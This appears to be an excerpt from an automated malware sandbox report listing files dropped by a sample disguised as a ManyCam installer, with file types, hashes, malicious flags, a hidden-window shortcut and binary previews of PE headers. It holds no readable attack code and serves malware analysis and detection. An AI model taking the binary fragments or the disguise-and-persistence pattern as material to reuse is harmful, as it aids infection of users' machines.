                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):498760
                                                                                                                                          Entropy (8bit):6.674124910838454
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
                                                                                                                                          MD5:C36F6E088C6457A43ADB7EDCD17803F3
                                                                                                                                          SHA1:B25B9FB4C10B8421C8762C7E7B3747113D5702DE
                                                                                                                                          SHA-256:8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
                                                                                                                                          SHA-512:87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):489984
                                                                                                                                          Entropy (8bit):6.620025610968628
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:R3KP8f7yYkluOutwm5ZNetC5IlhhMdyFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wbh:R3X5ZNG2yIycw5IGxRwVc6683WbQ4
                                                                                                                                          MD5:C481103724F456CB422834F633B221D9
                                                                                                                                          SHA1:4EDD4719E7F48F10A880D06F4FD8C2C2F09EA360
                                                                                                                                          SHA-256:652E514BE96A6AE38D61628B825B95A3F18189F97551B328D12BD4E0CB67F46F
                                                                                                                                          SHA-512:4F3F7167EDC693C73E7B50C8E15945C98681777C349926B5D4224A43CF59D5BE098E32191ECCF1DD41F56C4601DC8090DBAF26194C39FA991E366906458B57CA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):397312
                                                                                                                                          Entropy (8bit):6.672405371278951
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
                                                                                                                                          MD5:A354C42FCB37A50ECAD8DDE250F6119E
                                                                                                                                          SHA1:0EB4AD5E90D28A4A8553D82CEC53072279AF1961
                                                                                                                                          SHA-256:89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
                                                                                                                                          SHA-512:981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4092894
                                                                                                                                          Entropy (8bit):7.950017111810137
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:IuDlh/XIsGMfQ9c0B5KDsldsWAR+HwE0jnr7IEz3daB8:IAhvIgY+OMb+HwEMTx
                                                                                                                                          MD5:535E6BAA0579A8B19BED5857D49BDD0D
                                                                                                                                          SHA1:AF5B463561AFD9052575F266868DB19292D0EA6D
                                                                                                                                          SHA-256:8DAFB1E5373A0CC2CE18D7DBC4A51A127D104B9E7E3B95670F0DB2A9D7952D8F
                                                                                                                                          SHA-512:5546362378302B254EC2E0FDB31013866AF997C0C7A2420ED98AF1517B707CF36DFCB55830CD1FDB70CAE2EBF5EA999D4E9743BAF821D3BB55511AC8483D5DB8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.Y.L.J.gL.IQROaeg^UFL.ZTMJ.....FO.K..s.T...hU..a.Aj..........Pn....ui.B...T..lPfV.W.h.s..B..pK...G.iEyM...S..c........`.[.....PNe.C_.t....X..Qh\.ji.ENm.G`j.......jHYTJOY...y..l.\tDV......u.d.[..AXu.....g.`..^t.l.E...O.fDh.K....G.v.I.CN......ja`.DX.......U......XEi..l..]l.q\dxZT`rU.s...gC.s.Qy..uK.j.m.I.[C...DUX.ym..syA....i..gs.v.c.\.....U]._v.HL.wu..By.....pkY..KY.p..r.qBF.....q....H..C..Z.ZyJ...fupy.iy.R.Z.V.h.i......YT.WcL....._..Rw..i...q....p.Ifs.b...JDDTS.iieTnq.U...R..UBXmsL..T..g.......F.l]...j....nk.M.`.w.a...Ys.EJN..NX.lD.r...f.J.N..BZyNMJBhO.AS.Z...x.RbQ.L.j.wh....YV..en..Ydt...h.xX.o..SyI...bw]aAF.O.s...k..LCa...._.LLp..bxq..fef]CB.Y.tfc.ns...Ps.f..aK....YE..N.....\F.K.....rE...J.Jc..nU...yM.J`_L.^..n.^l..Yn....T..[.VJ...b.s.t.........AN.....O.c\.........B...].p.\.....V.E.QBeU...a...V_vOL.[.....nbisu.rR...^STMq]..q.kea..Pe.dg....utPPtF..e.r.a_.a_o.S..k[.h.\lw]Y....re.BGYrZ.ERHc.wU.u\K..GW...y..R..i.eV..F._.^\.Cbmyl..K`q.nK...pJ..^B..T....J.S........V.j.oqkj^^a.JVD..[.Wi.s[T
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):88923
                                                                                                                                          Entropy (8bit):4.3411591827480684
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:9UqVAygmDacN2Uc8p3PcjPugJ78LqHd6VJHBL+JkV0hL1mTHARcVYUmQNwkOX7xn:GyLDaGpfcD3WLhvHx+KoLETHbmQN4X7N
                                                                                                                                          MD5:CB4C2B33CC5CC6025B4F3B373CFCBE97
                                                                                                                                          SHA1:7D73D590AE51CE06021EC2E0DC939D267A79F788
                                                                                                                                          SHA-256:DAB9A7C4310FAC43CC21B924FE8899071E6884CD142F992C1FBAF5140C998268
                                                                                                                                          SHA-512:680990A0CFB7E8F8AC4AFD69AD292A03C46995529D62EAC76965297F8CB03D78AD8BB799B149E8E74DC90CC185A0DB53AEDD0DB80C36A8410D14F24C7F2FE9FB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.s..ETgX....E.....OS.x...M..^qJX.[..qx.OJb.iW.nZ.`T.PU..OT`...pq..s.g.x...^C...s.p...nG.o.bN.x..c...KDO..r..QFYl.iVM..V....O..xI_y...w...B.hH.B.g..U._..P.....L...f...m.y..A.\H.]d...O..y.Y.m..ue^.Xi..L..L..qhKNcN.[VhJjp....m^..^t.hxL......`.EF...gk.ctj.H.s.._UDC....k.led.Kg..fMx..N.nEuo....Fy...U.]...FM..k..[..M.JI\.....m.u...s..j.e..R_.Oc..L..hsB.D..[iT_x.K..WZ..jgc.al.].UPt...........w....wqP.....].....W_tQv..CB..Im.Fd.A.f...X.jS....Qg.VJf.._.AO...i.Y.BIPs.Nm.y..N.bs.xI.d.R.l.rr.u...l...mns....vd.p..vl..Kp.gS\fB.EE.CF.a\o...y....u...j.......[X.f.._.\.w..V...Znl.M...b.ss.M.qF.ghTM.......\.JW..v.v.X.os....qVh.....p..wd.`.S.\nHM.TIEy.H.QVdA.v..ntVuI.he.CptnK..N..mW..I.Y.H.m...V..JM....g.....G......].s_...cO.H..[.c.....B.M...o..Ji...n.^.A...X....S.N.Rx_..oK.Tc._........e.f..OS..M..y.E.WDg.hcNVE.biK.c..Ff.n....a...Ih...f^N.rRAj..IY....LQ\.K.Z._.u.Y.j..`OJ.....G..F]...D.Rh...QW..^.H.....h^NcRI..Y..FMBFt....C.K..L.k.X.jlq...Ds..._\H......Cif.y.R.....u....yLd...p...jho.]G.Hc.AVS...eBe...E..rS
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2364728
                                                                                                                                          Entropy (8bit):6.606009669324617
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                          MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                          SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                          SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                          SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5215852
                                                                                                                                          Entropy (8bit):7.672966815140129
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:ZLP/dFz6hLN4OZWqZB8HSsBpjV722UB9IuxI+P9I6wDDOwEM:Zb/dgTCHSSpjk9B9BFPiXOwH
                                                                                                                                          MD5:76649B61196C651A79488D512E2319AB
                                                                                                                                          SHA1:2533848ED6E5B4451707C03680EC8BE744D44F7F
                                                                                                                                          SHA-256:F09C0E37F19ED3E4594B9D8EDBCD0F8AECDD6A4A584B1B8E54B0D357F5A1576C
                                                                                                                                          SHA-512:2C1AC05ADFD5561E0E6714066D8174105E24C3D711EE764C4D6C4DEAC7C4424320AD477EEEB468C625BC1780F4D7928AE6FCF66BCEFC8343F11F8B87BB1DF944
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..m...m...m...m...m.=.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...l.<.=H].9Y<. qz..kv..DN..|v..DJ..jm. }w.1Hk..jx..DJ..jm.....m...m...m...m...m...m...m...m...m...m...m.Z.$vp..yu..}\.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.Z..j|..}P..lx..}..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.<.$V].?=E..{k..w..CV\.1^k..}n..s..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.o.C(7.]/+.m...m...m...m...m...m...m...m...m...m...m.
                                                                                                                                          Process:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5215852
                                                                                                                                          Entropy (8bit):7.67296694039451
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:hLP/dFz6hLN4OZWqZB8HSsBpjV722UB9IuxI+P9I6wDDOwEM:hb/dgTCHSSpjk9B9BFPiXOwH
                                                                                                                                          MD5:8C43B0A958F63B5472370E5F2519F1EE
                                                                                                                                          SHA1:F7847656DCC81897DC69F3EE4CCD40042916F065
                                                                                                                                          SHA-256:A094A575029571AA388D7A967F72CED99602E29047CD2D5265E3E2A1DEF674F9
                                                                                                                                          SHA-512:00B24E6D7AF825D423D6C5A74CF52CF4C679684FD0D9A63224AEE5063BF648D589B9F359530F094E3A03E4330F59A3D3E7EB566E56694929675AD7E2CB701739
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..m...m...m...m...m.=.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...l.<.=H].9Y<. qz..kv..DN..|v..DJ..jm. }w.1Hk..jx..DJ..jm.....m...m...m...m...m...m...m...m...m...m...m.Z.$vp..yu..}\.m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.Z..j|..}P..lx..}..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.<.$V].?=E..{k..w..CV\.1^k..}n..s..m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m...m.o.C(7.]/+.m...m...m...m...m...m...m...m...m...m...m.
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2118656
                                                                                                                                          Entropy (8bit):6.691133871535744
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:5wMIQK4YxQd/QBptz8YdQYoMLyN+ktx2yBfTOONMzGGUDsXipc0hU3L51DF:aAonqIO+kwztXPh
                                                                                                                                          MD5:E7D2F8DC61F637D0624823C6539BCDBB
                                                                                                                                          SHA1:40B1CD63BA62CBE90CFED885089134D2EEC68783
                                                                                                                                          SHA-256:9C9B8824D692E3F459B8A35D870490418848C5E470E8F9DFEFDF374E74F7219F
                                                                                                                                          SHA-512:E034512EAB1F4330E4C11AC855BFE122AAB0ED66CAC2779AF25E06E5F5C0C1D9C99AF3E12D8703728F571709678B495254BC9DC385A731C6304A2E155BE67CA1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=O.................4...@ ..`..W..........@............................. '......'!...`... ...............................................&.(.....&.8.......D^............'.h...........................@...(...................x.&..............................text....2.......4..................`..`.data........P.......8..............@....rdata....... ......................@..@.pdata..D^.......`..................@..@.xdata...G.... ..H..................@..@.bss.... _...` ..........................idata..(.....&......4 .............@....CRT....0.....&......: .............@....tls..........&......< .............@....rsrc...8.....&......> .............@..@.reloc..h.....'......@ .............@..Bqdx...........'......D .............@...................................................................................................................................
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Oct 19 16:53:02 2024, mtime=Sat Oct 19 16:53:02 2024, atime=Sat Oct 19 07:31:08 2024, length=1756232, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):914
                                                                                                                                          Entropy (8bit):5.004519753305515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:8O1Ke4qmWCc1dY//k0JLs/o68/6Te3AX5z/nODRjAyrHuEwJHFC5ODBmV:8WEqx51+JF+q3AX5a5Ay2ZFDBm
                                                                                                                                          MD5:3E8AC88DE913382EB0106C67FCC6B110
                                                                                                                                          SHA1:B4594B1D1989F4D3B690635DF4D699C78DBA99AE
                                                                                                                                          SHA-256:68CC4148B2FD217BC68EEEEA2D380F95E6F6C79ADD2248E8F97A12D5ABCC5764
                                                                                                                                          SHA-512:FB2A3C59687A1F0497654B04FC291D04E8EED4663070973BDF1A4890DC9B04727822AEAD790B83AD903EFD1296DC053C0BB46CBC5F173E920FA70B9F92AAE2D1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.... ......O"....-.O".....>."..H.........................:..DG..Yr?.D..U..k0.&...&......vk.v....q.j.O"......O"......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^SY.............................%..A.p.p.D.a.t.a...B.V.1.....SY....Roaming.@......CW.^SY................................R.o.a.m.i.n.g.....h.1.....SY....EH_MON~1..P......SY..SY......a.........................E.H._.M.o.n.i.t.o.r._.t.e.s.t.....b.2.H...SY.C .ManyCam.exe.H......SY..SY......v.........................M.a.n.y.C.a.m...e.x.e.......i...............-.......h.............du.....C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe..).....\.....\.R.o.a.m.i.n.g.\.E.H._.M.o.n.i.t.o.r._.t.e.s.t.\.M.a.n.y.C.a.m...e.x.e.`.......X.......942247...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2118656
                                                                                                                                          Entropy (8bit):6.691133871535744
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:5wMIQK4YxQd/QBptz8YdQYoMLyN+ktx2yBfTOONMzGGUDsXipc0hU3L51DF:aAonqIO+kwztXPh
                                                                                                                                          MD5:E7D2F8DC61F637D0624823C6539BCDBB
                                                                                                                                          SHA1:40B1CD63BA62CBE90CFED885089134D2EEC68783
                                                                                                                                          SHA-256:9C9B8824D692E3F459B8A35D870490418848C5E470E8F9DFEFDF374E74F7219F
                                                                                                                                          SHA-512:E034512EAB1F4330E4C11AC855BFE122AAB0ED66CAC2779AF25E06E5F5C0C1D9C99AF3E12D8703728F571709678B495254BC9DC385A731C6304A2E155BE67CA1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=O.................4...@ ..`..W..........@............................. '......'!...`... ...............................................&.(.....&.8.......D^............'.h...........................@...(...................x.&..............................text....2.......4..................`..`.data........P.......8..............@....rdata....... ......................@..@.pdata..D^.......`..................@..@.xdata...G.... ..H..................@..@.bss.... _...` ..........................idata..(.....&......4 .............@....CRT....0.....&......: .............@....tls..........&......< .............@....rsrc...8.....&......> .............@..@.reloc..h.....'......@ .............@..Bqdx...........'......D .............@...................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):123976
                                                                                                                                          Entropy (8bit):6.382577198291231
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:fzjKVg7GOfS5SqPcCXA4SQlah+8Z4OAAHWTtopW+Z:fzjKVg7GOESqPcCXxT8hhZ4OAAHW2Wa
                                                                                                                                          MD5:B2D1F5E4A1F0E8D85F0A8AEB7B8148C7
                                                                                                                                          SHA1:871078213FCC0CE143F518BD69CAA3156B385415
                                                                                                                                          SHA-256:C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
                                                                                                                                          SHA-512:1F6D97E02CD684CF4F4554B0E819196BD2811E19B964A680332268BCBB6DEE0E17B2B35B6E66F0FE5622DFFB0A734F39F8E49637A38E4FE7F10D3B5182B30260
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W.....U.....U.............U.......U.......U.....U.....U....Rich....................PE..L.....M...........!................'........ ......................................Gb..............................P........t..........d%..............H...........`$..............................0W..@............ ...............................text...8........................... ..`.rdata../l... ...n..................@..@.data...t...........................@....rsrc...d%.......&..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1756232
                                                                                                                                          Entropy (8bit):6.047140524753333
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:wlkcF8MnJ6tdGeHzpNTxlSvQynZAWBM2FU+SrzcBsWLZF5:wlf8MnJ6tdGeHzpNTxlSvfnOWC6U5Ed5
                                                                                                                                          MD5:BA699791249C311883BAA8CE3432703B
                                                                                                                                          SHA1:F8734601F9397CB5EBB8872AF03F5B0639C2EAC6
                                                                                                                                          SHA-256:7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
                                                                                                                                          SHA-512:6A0386424C61FBF525625EBE53BB2193ACCD51C2BE9A2527FD567D0A6E112B0D1A047D8F7266D706B726E9C41EA77496E1EDE186A5E59F5311EEEA829A302325
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R..R..R..f]..R..2...R....R....R....R....R..R..Q.....R....R....R..Rich.R..........................PE..L...e..M............................|B............@.................................f.........P......................................@..................H............................................d..@............................................text...b........................... ..`.rdata..B...........................@..@.data........P.......P..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):679936
                                                                                                                                          Entropy (8bit):6.674616014554414
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:dHxL34kbwAQR5+ERTJGZfnpyvhZFjtJbPbwQjtX5ooVyPMDFdqvGHjucsEUNwm/7:dzbwAQR57RJGoxjP7/2+HINwwb
                                                                                                                                          MD5:2A8B33FEE2F84490D52A3A7C75254971
                                                                                                                                          SHA1:16CE2B1632A17949B92CE32A6211296FEE431DCA
                                                                                                                                          SHA-256:FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2
                                                                                                                                          SHA-512:8DAF104582547D6B3A6D8698836E279D88AD9A870E9FDD66C319ECADA3757A3997F411976461ED30A5D24436BAA7504355B49D4ACEC2F7CDFE10E1E392E0F7FB
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.IO.q'..q'..q'...Y..q'.:.J..q'.:.Z..q'.:.\..q'..q&..q'.:.I.#q'.:.]..q'.:.[..q'.:._..q'.Rich.q'.........PE..L.....YM...........!.........p..........................................................................................a+......P.......,.......................T9..P...................................@...............,............................text............................... ..`.rdata..............................@..@.data...........0..................@....rsrc...,...........................@..@.reloc...:.......@... ..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):929792
                                                                                                                                          Entropy (8bit):6.883111719944197
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:dNoLaQGpXDCfZCgs1ruSteHz3+AzEOyIrbnYyw:7msgUeTGIrbM
                                                                                                                                          MD5:286284D4AE1C67D0D5666B1417DCD575
                                                                                                                                          SHA1:8B8A32577051823B003C78C86054874491E9ECFA
                                                                                                                                          SHA-256:37D9A8057D58B043AD037E9905797C215CD0832D48A29731C1687B23447CE298
                                                                                                                                          SHA-512:2EFC47A8E104BAA13E19BEE3B3B3364DA09CEA80601BC87492DE348F1C8D61008002540BA8F0DF99B2D20E333D09EA8E097A87C97E91910D7D592D11A953917A
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):498760
                                                                                                                                          Entropy (8bit):6.674124910838454
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
                                                                                                                                          MD5:C36F6E088C6457A43ADB7EDCD17803F3
                                                                                                                                          SHA1:B25B9FB4C10B8421C8762C7E7B3747113D5702DE
                                                                                                                                          SHA-256:8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
                                                                                                                                          SHA-512:87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):489984
                                                                                                                                          Entropy (8bit):6.620025610968628
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:R3KP8f7yYkluOutwm5ZNetC5IlhhMdyFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wbh:R3X5ZNG2yIycw5IGxRwVc6683WbQ4
                                                                                                                                          MD5:C481103724F456CB422834F633B221D9
                                                                                                                                          SHA1:4EDD4719E7F48F10A880D06F4FD8C2C2F09EA360
                                                                                                                                          SHA-256:652E514BE96A6AE38D61628B825B95A3F18189F97551B328D12BD4E0CB67F46F
